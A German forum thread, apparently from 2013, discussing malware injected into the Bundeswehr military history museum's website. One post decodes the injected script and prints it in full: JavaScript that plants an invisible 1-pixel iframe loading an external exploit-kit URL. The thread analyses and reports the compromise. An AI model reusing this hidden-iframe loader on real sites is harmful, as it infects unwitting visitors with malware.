Bundeswehr verseucht ?

B

Bierteufel

Registered User
Hallo,

sagt mal (bitte nur mit AV ansurfen), geht es nur mir so oder sind die Seiten des

Militär Historischen Museums der Bundeswehr

"befallen" :-)

www.mhmbw.de/index.php/


Code: 
<script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                                                                                                                                                                                                                                  try{window.document.body++}

Grad mal die Jungens angemailt, mal gucken bis sie sich "verteidigen" ....

:)
 
Jau, das CERTBw wird sich der Sache sicher annehmen.

Hab mir das JavaScript mal angesehen und konnte nicht nachvollziehen, wie es funktioniert bzw. was es macht. Hab die Seite auch mal von diversen Online-Tools prüfen lassen und die sind sich offensichtlich uneinig darüber, ob die Seite mit Malware befallen ist oder nicht.

Wenn ich mir mal einen Teil aus dem Array im JS rauskopiere und bei Google suche, findet man immerhin ne ganze Menge Ergebnisse ;)
 
Habe mir den Code mal angesehen:
Es wird versucht folgenden Code zur Laufzeit in den HTML-Body einzubinden:

Code: 
(function () {
    var ne = document.createElement('iframe');

    ne.src = 'http://froze.lv/sms/rel.php';
    ne.style.position = 'absolute';
    ne.style.border = '0';
    ne.style.height = '1px';
    ne.style.width = '1px';
    ne.style.left = '1px';
    ne.style.top = '1px';

    if (!document.getElementById('ne')) {
        document.write('<div id=\'ne\'></div>');
        document.getElementById('ne').appendChild(ne);
    }
})();

Das erzeugt einen iFrame in der Seite, der 1px hoch und breit ist (damit also faktisch unsichtbar ist) und von dort die URL aus "ne.src" nachlädt.
Da die Domain momentan nicht auflösbar ist (alle NS-Einträge wurden auf den Rootnameservern entfernt) weiß ich leider nicht was dort lauert - aber vermutlich der Klassiker, der versucht ein Java-Applet zu starten was dann die nicht enden wollenden Sicherheitslücken in Oracles Java ausnutzen und das System infizieren will.
 
Da der Host im IFrame seit mindestens einer Woche die Malware ausliefert, wird er wohl vom Hoster oder höherer Stelle stillgelegt worden sein. Den Referenzen nach lag/liegt dort wohl ein Exploit-Kit und es gab ausreichend Opfer.

Wann die MHMBW-Site infiziert wurde, war auf die Schnelle nicht festzustellen, auf Grund der jüngsten Einsatzpläne für die BW und dem Admin-C der Domain dürften es "nur" zwei bis vier Tage gewesen sein.
 
Was soll das mit den jüngsten Einsatzplänen der Bundeswehr zu tun haben? Normalerweise gehen solche Angriffe automatisiert auf alles los, was zu finden ist.

Und ob das Museum die erste Wahl ist um ein Statement zu setzen, ich weiß nicht.. ;)
 
Mr.Check said:
Und ob das Museum die erste Wahl ist um ein Statement zu setzen, ich weiß nicht.. ;)
Click to expand...
Wieviele BW-Sites liegen auf dem Host, oder anderen, der BW zuzuordnenden Hosts mit gleichem Softwarestack? Für einen Imageschaden reicht aber schon die Museumssite...

Das Joomla-Problem kommt noch obendrauf...
 
Joe User said:
Wieviele BW-Sites liegen auf dem Host, oder anderen, der BW zuzuordnenden Hosts mit gleichem Softwarestack? Für einen Imageschaden reicht aber schon die Museumssite...
Click to expand...

Die Zahl dürfte gegen Null tendieren. Normalerweise liegen Bundeswehr-Seiten in eigenen, bzw. von der BWI betreuten Rechenzentren.

Die gehackte Seite liegt auf einem 1&1 System, was für 0815-Bots, die einfach nur ihren Mist verbreiten wollen, wohl das interessante Ziel ist.

Ist zwar alles nur Spekulation aber ich denke eine politische Motivation da hineinzuinterpretieren ist etwas zu weit hergeholt, da hätte ich mindestens ein paar eindeutige Statements auf der Seite erwartet und keinen "versteckten" JavaScript-Code.
 
Also ich denke auch, Hauptursache fürs einschleusen

Joomla 1.6

Die Jungens & Mädels wissen seit gestern mind. Bescheid.

Mal gucken wann es entfernt wird...
 
Es sind allesamt Beamte UND es ist Winter. Daher wird es einige Zeit dauern, denn erst muß der Winterschlaf beendet sein und dann müssen wir die Beamtenarbeitsmoral in Ansatz bringen.

Ich gehe also von Mitte 2016 aus. :D:cool:

Gruß

Ulf
 
OT:
Mein Vater ist Beamter und muss von mir einige Späße ertragen.
Nachdem das Gebäude energetisch saniert wurde, gibt es jetzt einen Bewegungsmelder im Büro der das Licht ausschalten soll.
Mein erster Gedanke: "Auch doof, den ganzen Tag im Dunkeln zu sitzen...".
Und als wenn das nicht genug wäre hängt dort am schwarzen Brett in der Kategorie "Gesundheitsförderung" ein Angebot für einen Kurs mit dem Namen "Gesund durch richtiges Schlafen". In einer Behörde. Wo es fast jeder sehen kann. Aber auch da habe ich nur ein schlechtgelauntes Grunzen geerntet als ich ihm morgens ein Kissen mitgeben wollte - als Arbeitswerkzeug :D


Im Ernst:
So wie ich die interne Struktur der Behörden kenne kann das tatsächlich leider deutlich länger dauern als bei Privatpersonen oder Firmen der freien Wirtschaft.
Ich habe miterlebt, dass es etwa dreieinhalb Werktage gedauert hat einen Fehler in den Öffnungszeiten einer Behörde auf der Internetseite zu korrigieren. Der, dem es aufgefallen ist, muss erstmal intern herausfinden wer für die Internetseiten verantwortlich ist. Sobald man dem Herrn ABC eine Mail hat zukommen lassen fällt diesem ein paar Stunden später auf, dass er zwar theoretisch verantwortlich ist - dieser spezielle Bereich der Webseite aber eigentlich einer anderen Behörde obliegt und die Anfrage deshalb an Herrn XY geschickt werden müsste. Der "Weiterleiten"-Button funktioniert in Behörden leider nur bei Kettenbriefen.
Sobald man dem Herrn XY sein Anliegen also mitgeteilt hat stellt dieser nach Rücksprache mit einigen Ressorts fest, dass die Daten tatsächlich falsch sind und sich nicht aus einer Änderung ergeben.
Also kann man Herrn ABC anmailen und fragen wer denn die notwendigen Befugnisse hat, dies zu ändern. Herr ABC findet heraus dass Frau JKL das eigentlich können müsste und bittet Herrn XY sich an Frau JKL zu wenden. Weil es ja dringend ist, am besten per E-Mail.
Frau JKL bestätigt ihre Zuständigkeit und ändert die Daten tatsächlich schon am nächsten Tag. Allerdings sind die Änderungen damit nicht Live - erst muss der Abteilungsleiter Herr CVB diese Änderung bestätigen. Der ist aber heute früher raus und zweitens macht der das nur alle paar Tage wenn jemand dabei ist der ihm zeigen kann wie es geht.

Vermutlich wandert jetzt bereits ein Anfrage durch die Postfächer um zu sehen, in wessen Zuständigkeitsbereich der Footer einer Webseite fällt... :rolleyes:
 
Fallen wir jetzt hier auf BILD-Niveau herab?

Soldaten, insbesondere Zeitsoldaten sind keine Beamte - aber "Beamte" klingt halt so schön klischeehaft.

Ich gehe davon aus, dass der Fehler im Laufe der Woche behoben wird. Sind wir doch so fair und messen die Jungs an den Fakten die sie schaffen und nicht an Klischees ;)
 
Nein bin ich nicht. Aber ich beurteile Menschen und deren Leistung gerne nach Fakten und nicht nach Klischees.

Und wenn hier ständig von jungen Admins erwartet wird, nicht von Dingen zu sprechen, von denen sie keine Ahnung haben, sollte das auch für diesen Fall gelten ;)
 
Mr.Check said:
Und wenn hier ständig von jungen Admins erwartet wird, nicht von Dingen zu sprechen, von denen sie keine Ahnung haben, sollte das auch für diesen Fall gelten ;)
Click to expand...

Und wenn ich dir sage, dass dieses Bild von Beamten dadurch enstanden ist, indem man mit Beamten zu tun hatte? Sei es am Schalter oder auf der Straße oder sonst wo.
 
Mr.Check said:
Soldaten, insbesondere Zeitsoldaten sind keine Beamte - aber "Beamte" klingt halt so schön klischeehaft.

Ich gehe davon aus, dass der Fehler im Laufe der Woche behoben wird. Sind wir doch so fair und messen die Jungs an den Fakten die sie schaffen und nicht an Klischees ;)
Click to expand...

Dann laßt uns doch festhalten das es am 25.01.2013 um ca 20:20 gemeldet wurde und mal abwarten wie lange es dauern wird bis es behoben wurde :D . Wir können ja ein paar Tips abgeben, wer dichter dran ist hat gewonnen. Ich würde dann auf den 22.02.2013 14:35 tippen :D
 
You must log in or register to reply here.
Back
Top